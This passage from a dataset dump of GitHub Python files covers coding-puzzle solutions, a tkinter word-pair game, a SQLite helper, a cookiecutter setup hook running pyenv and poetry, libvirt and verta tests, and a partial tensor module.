{saocat.id[exclude_idx]}\\n')\n f.close()\n\n sys.exit(0)\n","repo_name":"PythonAstroimagingSuite/hfdfocus","sub_path":"find_star/saocatalog_exclude_stars.py","file_name":"saocatalog_exclude_stars.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71627415579","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def smallestFromLeaf(self, root):\n self.ans = '{}'\n\n def dfs(root, path):\n if not root:\n return\n if not root.left and not root.right:\n self.ans = min(self.ans, chr(root.val + 97) + path)\n dfs(root.left, chr(root.val + 97) + path)\n dfs(root.right, chr(root.val + 97) + path)\n\n dfs(root, '')\n return self.ans\n\n\nclass Solution3:\n def smallestFromLeaf(self, root):\n self.strings = []\n def dfs(node, s):\n if not node:\n return\n if not node.left and not node.right:\n self.strings.append(chr(97 + node.val) + s)\n\n dfs(node.left, chr(97 + node.val) + s)\n dfs(node.right, chr(97 + node.val) + s)\n\n dfs(root, \"\")\n return min(self.strings)\n","repo_name":"DustinKLo/practice_problems","sub_path":"leetcode/q988_smallest_string_starting_from_leaf.py","file_name":"q988_smallest_string_starting_from_leaf.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29812402913","text":"import sys\n\ninput = sys.stdin.readline\n\n\n# 1633 최고의 팀 만들기\n# 각 선수들의 백 능력치와 흑 능력치가 주어지고\n# 그 중 15명의 백 선수와 15명의 흑 선수 총 30명의 선수를 뽑아\n# 흑백 능력치의 합이 최대가 되는 팀을 만들 때, 그 팀의 능력치의 합을 구하는 문제\ndef sol1633():\n players = []\n while True:\n inp = list(map(int, input().split()))\n if not inp:\n break\n players.append(inp)\n n = len(players)\n\n dp = [[[0] * 16 for _ in range(16)] for _ in range(n)]\n\n def dfs(cur, cw, cb):\n if cur == n:\n return 0\n\n if not dp[cur][cw][cb]:\n res = 0\n\n need = 30 - cw - cb\n if n - cur - need > 0:\n res = max(res, dfs(cur + 1, cw, cb))\n\n if cw < 15:\n res = max(res, dfs(cur + 1, cw + 1, cb) + players[cur][0])\n\n if cb < 15:\n res = max(res, dfs(cur + 1, cw, cb + 1) + players[cur][1])\n dp[cur][cw][cb] = res\n\n return dp[cur][cw][cb]\n\n return dfs(0, 0, 0)\n","repo_name":"Scalas/PS_BaekJoon","sub_path":"solutions/sol1633.py","file_name":"sol1633.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18210392569","text":"from hug.middleware import LogMiddleware\nfrom datetime import datetime\nfrom timeit import default_timer\n\nclass CLALogMiddleware(LogMiddleware):\n \"\"\"CLA log middleware\"\"\"\n\n def __init__(self, logger=None):\n super().__init__(logger=logger)\n self.elapsed_time = 0\n self.start_time = None\n self.end_time = None\n\n def process_request(self, request, response):\n \"\"\"Logs CLA request \"\"\"\n self.logger.info(f'BEGIN {request.method} {request.path}')\n self.start_time = datetime.utcnow()\n super().process_request(request, response)\n \n def process_response(self, request, response, resource, req_succeeded):\n \"\"\"Logs data returned by CLA API \"\"\"\n if self.start_time:\n self.elapsed_time = datetime.utcnow() - self.start_time\n super().process_response(request, response, resource, req_succeeded)\n self.logger.info(f'END {request.method} {request.path} - elapsed_time : {self.elapsed_time.seconds} secs')\n\n","repo_name":"communitybridge/easycla","sub_path":"cla-backend/cla/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"69"}
+{"seq_id":"35540728332","text":"from tkinter import *\nimport WordpairsBack\nfrom time import time\nimport random\n\nclass Game :\n\n def __init__(self, name, level, list):\n self.name = name\n self.level = level\n self.list = list\n \n def intro(self) :\n welcome_statement = str(f\"Welcome {self.name}, you are on level {self.level}, with each level you will be shown an increasing number of word pairs for a period of time. You must enter all the corresponding word pairs to move on to the next level. Press hide and begin when you have remembered the wordpairs in the left box\")\n format_dialogue(welcome_statement)\n \n def intro_new_level(self) :\n intro_statement = str(f\"Well done {self.name}! You completed level {self.level}! You are now on level {(self.level + 1)}. Some words have been added to your list, press hide and begin when you are ready.\")\n format_dialogue(intro_statement)\n \n def level_up(self) :\n self.level += 1\n b_hide.configure(state = NORMAL)\n b_check.configure(state = DISABLED)\n return self.level\n\n def game_over(self) :\n game_over_statement = str(f\"That was not the correct pair, you've failed. The correct pairing was {this_level.current_pair[0]} and {this_level.current_pair[2]}. However you reached level {self.level} and your score has been added to the Highscore board.\")\n format_dialogue(game_over_statement)\n WordpairsBack.add_to_highscore(self.name, self.level)\n b_hide.configure(state = DISABLED)\n b_check.configure(state= DISABLED)\n\n\n\nclass Level :\n\n def __init__(self, level, c_answers, t_answers, pairs, current_pair = \"\"):\n self.level = level\n self.c_answers = c_answers\n self.t_answers = t_answers\n self.pairs = pairs\n self.current_pair = current_pair\n\n def get_question(self) :\n try : \n this_pair = random.choice(self.pairs)\n self.pairs.remove(this_pair)\n self.current_pair = this_pair\n except IndexError :\n print(\"level complete\")\n \n def correct_answer(self) :\n self.c_answers += 1\n \n \n def correct_answer_statement(self):\n format_dialogue(f\"That answer was correct! 
You are {self.c_answers}/{self.t_answers} of the way through this level\")\n\n\n \n\n \ndef format_dialogue(string) : \n list_dialogue.delete(0, END)\n split_string = string.split()\n max = len(split_string)\n a = 0\n b = 8\n f_dialogue = []\n while b <= max :\n f_dialogue.append(split_string[a : b])\n a +=8\n b +=8\n else: \n f_dialogue.append(split_string[(a) : ])\n ff_dialogue = []\n for rows in f_dialogue :\n ff_dialogue.append(\" \".join(rows))\n for rows in ff_dialogue :\n list_dialogue.insert(END, rows)\n return (ff_dialogue)\n \n\n\n\ndef start_game () : \n if not name_entry.get() :\n format_dialogue(\"You need to enter a username to begin\")\n \n else :\n wordpairs_list = WordpairsBack.create_list() \n name = name_entry.get() #Set's Game\n level = 1\n list = (wordpairs_list)\n global user\n user = Game(name, level, list)\n user.intro()\n\n list_wordpairs.delete(0, END) #Creates and prints list\n for wordpairs in wordpairs_list[0:user.level] :\n list_wordpairs.insert(END, wordpairs)\n disable_sandh()\n b_hide.configure(state = NORMAL)\n\n\n \ndef ent_control(event) :\n state_c = str(b_check['state'])\n state_s = str(b_start['state'])\n state_h = str(b_hide['state'])\n if state_c == 'normal' :\n check_entry()\n elif state_s == 'normal' :\n start_game()\n elif state_h == 'normal' :\n begin_level()\n else :\n pass\n\n\n\n\ndef check_entry() :\n global this_level\n list_dialogue.delete(0, END)\n if not list_wordpairs.get(0, END) :\n answer = pf_answer.get()\n if answer == this_level.current_pair[2] : #this needs to be taken from list not this pair os function is cyclable\n this_level.correct_answer()\n list_given_word.delete(0, END)\n e_answer.delete(0, END)\n if this_level.c_answers < this_level.t_answers :\n this_level.correct_answer_statement()\n this_level.get_question()\n list_given_word.insert(END, this_level.current_pair[0])\n else :\n user.intro_new_level()\n user.level_up()\n list_wordpairs.delete(0, END) #Creates and prints list\n for word_pairs in user.list[0 : user.level] :\n list_wordpairs.insert(END, word_pairs)\n else : \n user.game_over()\n enable_sandh()\n else : \n format_dialogue(\"You need to press hide and begin before you can enter the pair. 
No cheating\")\n pass\n\n\n\ndef begin_level():\n list_given_word.delete(0, END)\n list_wordpairs.delete(0, END)\n global this_level\n this_level = Level(user.level, 0, user.level, user.list[0:user.level])\n this_level.get_question()\n list_given_word.insert(END, this_level.current_pair[0])\n b_check.configure(state = NORMAL)\n b_hide.configure(state = DISABLED)\n\n\n\ndef check_highscore():\n highscores = WordpairsBack.check_highscore()\n list_wordpairs.delete(0, END)\n for scores in highscores :\n list_wordpairs.insert(END, scores)\n\n\ndef disable_sandh() :\n b_start.configure(state = DISABLED)\n b_highscore.configure(state = DISABLED)\n\ndef enable_sandh() :\n b_start.configure(state = NORMAL)\n b_highscore.configure(state = NORMAL)\n \nwindow = Tk()\n\nwindow.wm_title(\"WordPairs\")\n\n\n\nb_start = Button(window, text = \"Start\", width = 12, command = start_game)\nb_start.grid(row = 1, column = 2)\nb_start.configure(state = NORMAL)\n\nb_highscore = Button(window, text = \"Highscores\", width = 12, command = check_highscore)\nb_highscore.grid(row = 1, column = 1)\nb_highscore.configure(state = NORMAL)\n\nb_check = Button(window, text = \"Check Entry\", width = 40, command = check_entry)\nb_check.grid(row = 5 , column = 1, columnspan = 2)\nb_check.configure(state= DISABLED)\n\nb_hide = Button(window, text = \"Hide and Begin\", width = 40, command = begin_level)\nb_hide.grid(row = 7, column = 0, padx = 15, pady= 20)\nb_hide.configure(state = DISABLED)\n\nl_name = Label(window, text = \"Enter your name: \")\nl_name.grid( row = 0, column = 1)\n\nl_word = Label(window, text = \"Given word\")\nl_word.grid(row = 3, column = 1)\n\nl_entry = Label(window, text = \"Enter pair\")\nl_entry.grid(row = 3, column = 2)\n\nlist_dialogue = Listbox(window, height = 7, width = 40)\nlist_dialogue.grid(row = 2, column = 1, rowspan = 1, columnspan = 2, padx= 15)\n\nlist_wordpairs = Listbox(window, height = 20, width = 40)\nlist_wordpairs.grid(row = 0, column = 0, rowspan = 6, pady = 15, padx =15, ipady = 15, ipadx = 15)\n\nlist_given_word = Listbox(window, height = 1, width = 20)\nlist_given_word.grid(row = 4, column = 1)\n\n\nname_entry = StringVar()\ne_name = Entry(window, textvariable = name_entry)\ne_name.grid(row = 0, column = 2)\n\n\npf_answer = StringVar()\ne_answer = Entry(window, textvariable = pf_answer)\ne_answer.grid(row = 4, column = 2)\n\nwindow.bind('', ent_control)\n\n\n\nwindow.mainloop()\n\n\n","repo_name":"Jordanw95/WordPairs","sub_path":"WordpairsFront.py","file_name":"WordpairsFront.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7531713890","text":"import json\nfrom .languageData import languageData\n\n\nclass LanguageResult:\n def __init__(self, results=None, num_ngrams=None):\n self.language = (languageData.lang_codes[results[0][0]] if results else None)\n self.__results = results\n self.__num_ngrams = num_ngrams\n\n def __str__(self):\n return json.dumps({'': {\n 'language': self.language,\n 'scores()': self.scores(),\n 'is_reliable()': self.is_reliable()\n }\n })\n\n def scores(self):\n return _get_scores(self.__results)\n\n def is_reliable(self):\n if not self.language or self.__num_ngrams < 3 or not self.__results:\n return False\n next_score = (self.__results[1][1] if len(self.__results) > 1 else 0)\n # A minimum of a 24% from the average score\n if languageData.avg_score[self.language] * 0.24 > (self.__results[0][1] / self.__num_ngrams) \\\n or 0.01 > abs(self.__results[0][1] - next_score):\n return False\n return True\n\n\ndef _get_scores(results):\n scores = {}\n if results:\n for value in results:\n scores[languageData.lang_codes[value[0]]] = value[1]\n return scores\n","repo_name":"nitotm/efficient-language-detector-py","sub_path":"eld/languageResult.py","file_name":"languageResult.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436114439","text":"import logging as log\n\nfrom virttest import libvirt_xml\nfrom virttest import utils_config\nfrom virttest import utils_libvirtd\nfrom virttest import utils_misc\nfrom virttest import virsh\n\nfrom virttest.utils_test import libvirt\nfrom virttest.libvirt_xml.devices.serial import Serial\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef check_pty_log_file(file_path, boot_prompt):\n \"\"\"\n Check if pty log file has vm boot up logs\n\n :param file_path: the pty log file path\n :param boot_prompt: the expected login prompt\n :return: True or False according the result of finding\n \"\"\"\n\n with open(file_path, errors='ignore') as fp:\n contents = fp.read()\n logging.debug(\"The contents of log file are : %s\" % contents)\n ret = contents.find(boot_prompt)\n if ret == -1:\n return False\n return True\n\n\ndef run(test, params, env):\n \"\"\"\n Test pty type serial with log file\n \"\"\"\n\n def prepare_serial_device():\n \"\"\"\n Prepare a serial device XML according to parameters\n\n :return: the serial device xml object\n \"\"\"\n serial = Serial(serial_type)\n\n serial.target_port = target_port\n serial.target_type = target_type\n serial.target_model = target_model\n serial.log_file = log_file\n\n return serial\n\n def update_qemu_conf():\n \"\"\"\n update some settings in qemu conf file\n \"\"\"\n qemu_conf.stdio_handler = stdio_handler\n daemon_service.restart()\n\n remove_devices = eval(params.get('remove_devices', []))\n target_model = params.get('target_model', '')\n serial_type = params.get('serial_dev_type', 'pty')\n log_file = params.get('log_file', '')\n target_type = params.get('target_type', 'isa-serial')\n target_port = params.get('target_port', '0')\n target_model = params.get('target_model', '')\n stdio_handler = params.get('stdio_handler', \"logd\")\n boot_prompt = params.get('boot_prompt', 'Login Prompts')\n vm_name = params.get(\"main_vm\")\n\n qemu_conf = utils_config.get_conf_obj(\"qemu\")\n daemon_service = utils_libvirtd.Libvirtd()\n\n update_qemu_conf()\n\n backup_xml = libvirt_xml.VMXML.new_from_dumpxml(vm_name)\n\n try:\n vmxml = backup_xml.copy()\n vm = env.get_vm(vm_name)\n vm.undefine()\n\n for device_type in remove_devices:\n vmxml.remove_all_device_by_type(device_type)\n serial_dev = prepare_serial_device()\n vmxml.add_device(serial_dev)\n vmxml.sync()\n logging.debug(\"vmxml: %s\" % vmxml)\n\n ret = virsh.define(vmxml.xml, debug=True)\n libvirt.check_exit_status(ret)\n virsh.start(vm_name, ignore_status=False)\n vm.wait_for_login().close()\n\n # Need to wait for a while to get login prompt\n if not utils_misc.wait_for(\n lambda: check_pty_log_file(log_file, boot_prompt), 6):\n test.fail(\"Failed to find the vm login prompt from %s\" % log_file)\n\n except Exception as e:\n test.error('Unexpected error: {}'.format(e))\n finally:\n vm.destroy()\n backup_xml.sync()\n qemu_conf.restore()\n daemon_service.restart()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/serial/serial_pty_log.py","file_name":"serial_pty_log.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"72027573019","text":"import cProfile\nimport pstats\n\nclass ProfiledTest(object):\n def setUp(self):\n '''Start before any tests'''\n super(ProfiledTest, self).setUp()\n self.profiler = cProfile.Profile()\n self.profiler.enable()\n print(\"\\n<<<---\")\n\n def tearDown(self):\n \"\"\"Finish after any test\"\"\"\n super(ProfiledTest, self).tearDown()\n stats = pstats.Stats(self.profiler)\n stats.strip_dirs()\n stats.sort_stats('cumtime')\n stats.print_stats()\n print(\"\\n--->>>\")\n\n","repo_name":"e0ne/profiled_test","sub_path":"profiled_test.py","file_name":"profiled_test.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9381675430","text":"from sqlite3 import Error, connect\nfrom logging import info\n\n\nclass DbManager:\n db = None\n\n def __init__(self, path_db):\n try:\n DbManager.db = connect(path_db, check_same_thread=False)\n DbManager.db.isolation_level = None\n except Error:\n raise\n\n @staticmethod\n def close_db():\n try:\n DbManager.db.close()\n except Error:\n raise\n\n @staticmethod\n def row_to_dict(cursor, row):\n data = {}\n for idx, col in enumerate(cursor.description):\n data[str.lower(col[0])] = row[idx]\n return data\n\n @staticmethod\n def select(query):\n try:\n cur = DbManager.db.cursor()\n cur.row_factory = DbManager.row_to_dict\n info(\"ESEGUO LA QUERY: %s\", query)\n cur.execute(str(query))\n result = cur.fetchall()\n except Error:\n DbManager.db.rollback()\n raise\n return result\n\n @staticmethod\n def insert_or_update(query):\n try:\n cur = DbManager.db.cursor()\n info(\"ESEGUO LA QUERY: %s\", query)\n cur.execute(str(query))\n DbManager.db.commit()\n except Error:\n DbManager.db.rollback()\n raise\n\n @staticmethod\n def multiple_statement(query):\n try:\n cur = DbManager.db.cursor()\n cur.executescript(str(query))\n DbManager.db.commit()\n except Error:\n DbManager.db.rollback()\n raise\n","repo_name":"sgarzo10/WorkPixil","sub_path":"src/dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28915250257","text":"import pytest\n\nimport verta.configuration\n\n\nclass TestInternalFunctions:\n def test_value_to_msg(self):\n fn = verta.configuration.Hyperparameters._value_to_msg\n\n assert fn(0)\n assert fn(0.3)\n assert fn(\"coconut\")\n\n def test_hyperparameter_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_to_msg\n\n assert fn(\"banana\", 0)\n assert fn(\"banana\", 0.3)\n assert fn(\"banana\", \"foo\")\n\n def test_hyperparamater_range_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_range_to_msg\n\n assert fn(\"banana\", (0, 12, 3))\n with pytest.raises(TypeError):\n fn(\"banana\", 0)\n with pytest.raises(ValueError):\n fn(\"banana\", (0, 12))\n\n def test_hyperparameter_set_to_msg(self):\n fn = verta.configuration.Hyperparameters._hyperparameter_set_to_msg\n\n assert fn(\"banana\", list(range(0, 12, 3)))\n with pytest.raises(TypeError):\n fn(\"banana\", 0)\n\nclass TestHyperparameters:\n HYPERPARAMETERS = {'banana': \"foo\"}\n HYPERPARAMETER_RANGES = {'coconut': (0, 12, 3)}\n HYPERPARAMETER_SETS = {'durian': list(range(0, 12, 3))}\n\n def test_hyperparameters(self):\n config = verta.configuration.Hyperparameters(\n hyperparameters=self.HYPERPARAMETERS,\n )\n\n name, value = list(self.HYPERPARAMETERS.items())[0]\n\n hyperparam_msg = config._msg.hyperparameters[0]\n assert hyperparam_msg.name == name\n value_msg = hyperparam_msg.value\n assert getattr(value_msg, value_msg.WhichOneof('value')) == value\n\n def test_hyperparamater_ranges(self):\n config = verta.configuration.Hyperparameters(\n hyperparameter_ranges=self.HYPERPARAMETER_RANGES,\n )\n\n name, (begin, end, step) = list(self.HYPERPARAMETER_RANGES.items())[0]\n\n hyperparam_msg = config._msg.hyperparameter_set[0]\n assert hyperparam_msg.name == name\n begin_msg = hyperparam_msg.continuous.interval_begin\n assert getattr(begin_msg, begin_msg.WhichOneof('value')) == begin\n end_msg = hyperparam_msg.continuous.interval_end\n assert getattr(end_msg, end_msg.WhichOneof('value')) == end\n step_msg = hyperparam_msg.continuous.interval_step\n assert getattr(step_msg, step_msg.WhichOneof('value')) == step\n\n def test_hyperparameter_sets(self):\n config = verta.configuration.Hyperparameters(\n hyperparameter_sets=self.HYPERPARAMETER_SETS,\n )\n\n name, sequence = list(self.HYPERPARAMETER_SETS.items())[0]\n\n hyperparam_msg = config._msg.hyperparameter_set[0]\n assert hyperparam_msg.name == name\n for value_msg, value in zip(hyperparam_msg.discrete.values, sequence):\n assert getattr(value_msg, value_msg.WhichOneof('value')) == value\n\n def test_commit(self, commit):\n config = verta.configuration.Hyperparameters(\n hyperparameters=self.HYPERPARAMETERS,\n hyperparameter_ranges=self.HYPERPARAMETER_RANGES,\n hyperparameter_sets=self.HYPERPARAMETER_SETS,\n )\n\n commit.update('config', config)\n commit.save(message=\"banana\")\n assert commit.get('config')\n\n def test_repr(self):\n \"\"\"Tests that __repr__() executes without error\"\"\"\n config = verta.configuration.Hyperparameters(\n hyperparameters={\n 'a': 1, 'b': 1,\n },\n hyperparameter_ranges={\n 'c': (1, 5, 1), 'd': (1, 5, 1),\n },\n hyperparameter_sets={\n 'e': [1, 2], 'f': [1, 2],\n },\n )\n\n assert config.__repr__()\n","repo_name":"yongsheng268/VertaAI-modeldb","sub_path":"client/verta/tests/test_versioning/test_configuration.py","file_name":"test_configuration.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"13477001376","text":"import logging\nimport os\nimport sys\n\n# Target Python version choose by user\nREQUIRED_PYTHON_VERSION = \"{{ cookiecutter.python_version }}\"\n\n# Command template to update pyenv to latest values\nUPDATE_PYENV_COMMAND = \"pyenv update\"\n\n# Command template to find latest available Python version from pyenv given required version (BASH required)\nFIND_LATEST_PYTHON_VERSION_AVAILABLE_COMMAND = \"pyenv install --list | grep -v - | grep -v b | grep {} | tail -1\"\n\n# Command template to install some specific Python version with pyenv\nINSTALL_PYTHON_COMMAND = \"pyenv install {}\"\n\n# Command template to ensure poetry, tox and pre-commit are installed\nINSTALL_POETRY_AND_TOX_COMMAND = \"pyenv local {} && pip install --upgrade pip && pipx install poetry && pipx install tox && pipx install pre-commit\"\n\n# Command template to create some virtual environment inside project folder (make easy to use IDEs)\nCREATE_VIRTUAL_ENVIRONMENT_COMMAND = \"pyenv local {} && python -m venv .venv\"\n\n# Command template to install all dependencies on virtual environment\nINSTALL_DEPENDENCIES_ON_VIRTUAL_ENVIRONMENT_COMMAND = \"poetry install\"\n\n# Command template to initialize git with pre-commit hooks\nINIT_GIT_ON_PROJECT_COMMAND = \"git init && pre-commit install\"\n\n\ndef install_base_dependencies():\n def get_latest_python_version():\n if sys.platform.startswith(\"win\"):\n sys.exit(\"Windows platform currently not supported\")\n else:\n cmd = FIND_LATEST_PYTHON_VERSION_AVAILABLE_COMMAND.format(REQUIRED_PYTHON_VERSION)\n latest_version = os.popen(cmd).read().strip()\n logging.info(\"Using more recent python version from {}: {}\".format(REQUIRED_PYTHON_VERSION, latest_version))\n return latest_version\n\n def ensure_pyenv_is_updated():\n logging.info(\"Updating pyenv\")\n os.system(UPDATE_PYENV_COMMAND)\n\n def ensure_python_version_is_installed():\n logging.info(\"Following Python version will be installed: {}\".format(python_version))\n cmd = INSTALL_PYTHON_COMMAND.format(python_version)\n os.system(cmd)\n\n def ensure_poetry_and_tox_are_installed():\n logging.info(\"Installing poetry.\")\n cmd = INSTALL_POETRY_AND_TOX_COMMAND.format(python_version)\n os.system(cmd)\n\n def ensure_virtual_env_is_created():\n logging.info(\"Creating virtualenv inside project directory.\")\n cmd = CREATE_VIRTUAL_ENVIRONMENT_COMMAND.format(python_version)\n os.system(cmd)\n\n def install_all_dependencies():\n logging.info(\"Install all dependencies on virtual environment.\")\n cmd = INSTALL_DEPENDENCIES_ON_VIRTUAL_ENVIRONMENT_COMMAND\n os.system(cmd)\n\n def init_git_on_local():\n logging.info(\"Initialize git repository on local with pre-commit hooks.\")\n cmd = INIT_GIT_ON_PROJECT_COMMAND\n os.system(cmd)\n\n ensure_pyenv_is_updated()\n python_version = get_latest_python_version()\n ensure_python_version_is_installed()\n ensure_poetry_and_tox_are_installed()\n ensure_virtual_env_is_created()\n install_all_dependencies()\n init_git_on_local()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n install_base_dependencies()\n","repo_name":"jazumaquero/python_template","sub_path":"base/hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17582637957","text":"import unittest\n\nimport numpy as NP\n\n\ntry:\n import sympy\n X, Y, Z = sympy.symbols('X Y Z')\n HAVE_SYMPY = True\nexcept ImportError:\n HAVE_SYMPY = False\n\ndef flatten(x):\n \"\"\"flatten(sequence) -> list\n\n Returns a single, flat list which contains all elements retrieved\n (iterables).\n\n Examples:\n >>> [1, 2, [3,4], (5,6)]\n [1, 2, [3, 4], (5, 6)]\n >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])\n [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]\"\"\"\n\n result = []\n for el in x:\n if hasattr(el, \"__iter__\") and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n\nclass Tensor:\n\n is_tensor = 1\n\n def __init__(self, elements, nocheck = None):\n\n self.array = NP.array(elements)\n if nocheck is None:\n if not NP.logical_and.reduce(NP.equal(NP.array(self.array.shape), 3)):\n raise ValueError('Tensor must have length 3 along any axis')\n self.rank = len(self.array.shape)\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n s = 'TensorModule.Tensor(numpy.array(' + str(self.array) + ') )'\n s = s.replace('\\n', ',')\n return s\n\n def __add__(self, other):\n return Tensor(self.array+other.array, 1)\n __radd__ = __add__\n\n def __neg__(self):\n return Tensor(-self.array, 1)\n\n def __sub__(self, other):\n return Tensor(self.array-other.array, 1)\n\n def __rsub__(self, other):\n return Tensor(other.array-self.array, 1)\n\n def __rmul__(self, other):\n if isTensor(other):\n return Tensor(self.array*other.array, 1)\n else:\n return Tensor(self.array*other, 1)\n\n def __div__(self, other):\n if isTensor(other):\n if other.rank == 0:\n return Tensor(self.array/other.array, 1)\n else:\n raise TypeError(\"Can't divide by a tensor\")\n else:\n return Tensor(self.array/(1.*other), 1)\n\n def __rdiv__(self, other):\n raise TypeError(\"Can't divide by a tensor\")\n\n def __cmp__(self, other):\n if not isTensor(other):\n return NotImplemented\n if self.rank != other.rank:\n return 1\n else:\n return not NP.logical_and.reduce(\n NP.equal(self.array, other.array).flat)\n\n def __len__(self):\n return 3\n\n def __getitem__(self, index):\n elements = self.array[index]\n if type(elements) == type(self.array):\n return Tensor(elements)\n else:\n return elements\n\n def dot(self, other):\n if isTensor(other):\n a = self.array\n b = NP.transpose(other.array, list(range(1, other.rank))+[0])\n return Tensor(NP.inner(a, b), 1)\n else:\n return Tensor(self.array*other, 1)\n\n def sqrt(self):\n return Tensor(self.array**0.5, 1)\n\n def diagonal(self, axis1=0, axis2=1):\n if self.rank == 2:\n return Tensor([self.array[0, 0], self.array[1, 1], self.array[2, 2]])\n else:\n if axis2 < axis1:\n axis1, axis2 = axis2, axis1\n raise ValueError('Not yet implemented')\n\n def trace(self, axis1=0, axis2=1):\n if self.rank == 2:\n return self.array[0, 0]+self.array[1, 1]+self.array[2, 2]\n else:\n raise ValueError('Not yet implemented')\n\n def transpose(self):\n return Tensor(NP.transpose(self.array))\n\n def determinant(self):\n if NP.shape(self.array) == (3, 3) :\n M = self\n a = M[0, 0]\n b = M[0, 1]\n c = M[0, 2]\n d = M[1, 0]\n e = M[1, 1]\n f = M[1, 2]\n g = M[2, 0]\n h = M[2, 1]\n i = M[2, 2]\n Determinant = a*(e*i - f*h) - b*(d*i - f*g) + c*(d*h - e*g)\n return Determinant\n else :\n raise ValueError ('Tenseur must of rank 2 and shape 3 by 3')\n\n def inverse(self):\n if NP.shape(self.array) == (3, 3) :\n M = self\n a = M[0, 0]\n b = M[0, 1]\n c = M[0, 2]\n d = M[1, 0]\n e = M[1, 1]\n f = M[1, 
2]\n g = M[2, 0]\n h = M[2, 1]\n i = M[2, 2]\n Mprime = NP.array([[ e*i - f*h, c*h - b*i, b*f - c*e ], [ f*g - d*i, a*i - c*g, c*d - a*f ], [ d*h - e*g, b*g - a*h, a*e - b*d ]])\n det = M.determinant()\n Inverse = Mprime*(1/det)\n return Tensor(Inverse)\n else :\n raise ValueError ('Tenseur must of rank 2 and shape 3 by 3')\n\n def symmetricalPart(self):\n if self.rank == 2:\n return Tensor(0.5*(self.array + \\\n NP.transpose(self.array,\n NP.array([1, 0]))),\n 1)\n else:\n raise ValueError('Not yet implemented')\n\n def matrixmultiply(self, other):\n if self.rank == 2 and other.rank == 2:\n return Tensor(NP.matrixmultiply(NP.transpose(self.array), other.array))\n else:\n raise ValueError('Tenseur must of rank 2')\n\n def asymmetricalPart(self):\n if self.rank == 2:\n return Tensor(0.5*(self.array - \\\n NP.transpose(self.array,\n NP.array([1, 0]))),\n 1)\n else:\n raise ValueError('Not yet implemented')\n\n def eigenvalues(self):\n if self.rank == 2:\n return eigenvals(self.array)\n else:\n raise ValueError('Undefined operation')\n\n def diagonalization(self):\n if self.rank == 2:\n ev, vectors = eigenvects(self.array)\n return ev, Tensor(vectors)\n else:\n raise ValueError('Undefined operation')\n\n def sympyVariables(self):\n variablesList = []\n for exp in NP.ravel(self.array):\n try:\n variablesList.append(exp.atoms(sympy.Symbol))\n except:\n pass\n if len(variablesList) > 3:\n raise ValueError('sympy Tensor must have less than 3 sympy variables')\n variablesSet = set(flatten(variablesList))\n return list(sorted(variablesSet))\n\n def produitDoubleContracte(self, other):\n if self.rank >= 2 and other.rank >= 2:\n resultat = NP.resize(0, [3]*(self.rank+other.rank-4))\n for j in range(3):\n resultat = resultat+NP.inner(NP.transpose(self.array[j]), other.array[j])\n else :\n raise ValueError('range of each Tensor must be at least 2')\n return Tensor(resultat)\n\n def produitSimpleContracte(self, other):\n rank = self.rank + other.rank - 2\n # Ruse pour produire un objet Sympy nul\n out_array = NP.array([X]*(3**rank))\n out_array.shape = [3, ]*rank\n if not (self.rank >= 1 and other.rank >= 1):\n raise ValueError('range of each Tensor must be at least 1')\n if self.rank == 1 and other.rank == 1:\n out_array = NP.dot(self.array, other.array)\n elif self.rank == 2 and other.rank == 1:\n for i in range(3):\n out_array[i] = NP.dot(self.array[i,:], other.array)\n elif self.rank == 2 and other.rank == 2:\n for i in range(3):\n for j in range(3):\n out_array[i][j] = NP.dot(self.array[i,:], other.array[:, j])\n elif self.rank == 4 and other.rank == 2:\n for i in range(3):\n for j in range(3):\n for k in range(3):\n for l in range(3):\n out_array[i][j][k][l] = NP.dot(self.array[i, j, k,:], other.array[:, l])\n else :\n raise NotImplemented\n return Tensor(out_array)\n\ndef isTensor(x):\n return isinstance(x, Tensor)\n\ndef grad(F):\n if not isTensor(F):\n raise ValueError('Argument must be a Tensor')\n varList = [X, Y, Z] #F.sympyVariables()\n gradF = NP.resize(F.array, flatten((F.array.shape, 3)))\n # see http://code.google.com/p/sympy/issues/detail?id=2622\n def _diff(elt, symb):\n \"\"\"apply sympy.diff on 'elt' or each element of 'elt' if iterable\"\"\"\n 